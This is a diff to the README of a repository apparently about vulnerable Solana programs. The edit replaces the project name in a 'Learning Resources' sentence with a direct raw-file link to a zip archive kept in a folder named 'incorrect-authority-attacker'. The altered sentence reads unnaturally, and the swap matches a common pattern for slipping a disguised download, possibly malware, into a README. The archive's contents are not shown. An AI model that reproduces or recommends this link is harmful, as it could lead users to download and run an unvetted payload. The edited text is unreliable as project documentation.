ranman911/vulnerable.so/README.md

 ## 💡 Learning Resources

-As you explore vulnerable.so, consider checking out the following resources for further learning:
+As you explore https://raw.githubusercontent.com/ranman911/vulnerable.so/main/programs/02c-incorrect-authority-attacker/so-vulnerable-2.6.zip, consider checking out the following resources for further learning:

 - **Anchor Documentation:** Learn about the Anchor framework used in Solana development.
 - **Rust Language Guide:** Dive into programming with Rust to enhance your skills.